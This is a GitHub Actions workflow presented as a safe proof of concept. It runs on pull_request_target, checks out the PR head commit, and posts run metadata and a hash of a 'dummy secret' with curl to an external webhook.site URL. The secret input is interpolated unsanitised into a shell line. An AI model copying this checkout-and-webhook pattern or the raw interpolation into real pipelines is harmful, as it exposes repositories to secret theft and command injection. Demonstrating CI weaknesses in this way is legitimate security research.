name: SAFE PoC – Metadata & Dummy Secret Demo (Base Repo Only)

on:
  pull_request_target:
    branches: [ main ]

  workflow_dispatch:
    inputs:
      TEST_SECRET:
        description: "Dummy secret for PoC (safe, not real)"
        required: false
        default: ""

permissions:
  contents: read

env:
  WEBHOOK_URL: "https://webhook.site/3fe8a22a-5982-47f3-9373-e439ba1b9832"

jobs:
  guard_against_forks:
    runs-on: ubuntu-latest
    steps:
      - name: Check if PR comes from same repo
        run: |
          if [ "${{ github.event.pull_request.head.repo.full_name }}" != "${{ github.repository }}" ]; then
            echo "❌ Skipping run because PR is from a forked repo"
            exit 1
          else
            echo "✅ PR is from base repo, continuing..."
          fi

  metadata_only:
    needs: guard_against_forks
    runs-on: ubuntu-latest
    steps:
      - name: Checkout base repo code
        uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}

      - name: Create metadata
        run: |
          {
            echo "EVENT_TYPE=${{ github.event_name }}";
            echo "REPO=${{ github.repository }}";
            echo "RUN_ID=${{ github.run_id }}";
            echo "ACTOR=${{ github.actor }}";
            echo "PR_NUMBER=${{ github.event.pull_request.number }}";
            echo "TIMESTAMP=$(date -u +%FT%TZ)";
          } | tee poc-info.txt

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: poc-info
          path: poc-info.txt
          retention-days: 1

      - name: Send metadata to webhook
        run: |
          jq -n \
            --arg event "${{ github.event_name }}" \
            --arg repo "${{ github.repository }}" \
            --arg run_id "${{ github.run_id }}" \
            --arg pr "${{ github.event.pull_request.number }}" \
            --arg actor "${{ github.actor }}" \
            --arg ts "$(date -u +%FT%TZ)" \
            '{event:$event, repo:$repo, run_id:$run_id, pr:$pr, actor:$actor, timestamp:$ts}' \
          | curl -sS -X POST -H "Content-Type: application/json" -d @- "$WEBHOOK_URL"

  dummy_secret_test:
    if: ${{ github.event_name == 'workflow_dispatch' && inputs.TEST_SECRET != '' }}
    runs-on: ubuntu-latest
    steps:
      - name: Hash dummy secret
        run: |
          D="${{ inputs.TEST_SECRET }}"
          LEN=${#D}
          SHA=$(printf '%s' "$D" | sha256sum | awk '{print $1}')
          printf 'LEN=%s\nSHA=%s\n' "$LEN" "$SHA" | tee dummy-secret-info.txt

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: dummy-secret-info
          path: dummy-secret-info.txt
          retention-days: 1

      - name: Send dummy secret metadata
        run: |
          LEN=$(grep '^LEN=' dummy-secret-info.txt | cut -d= -f2)
          SHA=$(grep '^SHA=' dummy-secret-info.txt | cut -d= -f2)
          jq -n \
            --arg repo "${{ github.repository }}" \
            --arg run_id "${{ github.run_id }}" \
            --arg len "$LEN" \
            --arg sha "$SHA" \
            --arg ts "$(date -u +%FT%TZ)" \
            '{repo:$repo, run_id:$run_id, dummy_secret_len:$len, dummy_secret_sha256:$sha, timestamp:$ts}' \
          | curl -sS -X POST -H "Content-Type: application/json" -d @- "$WEBHOOK_URL"
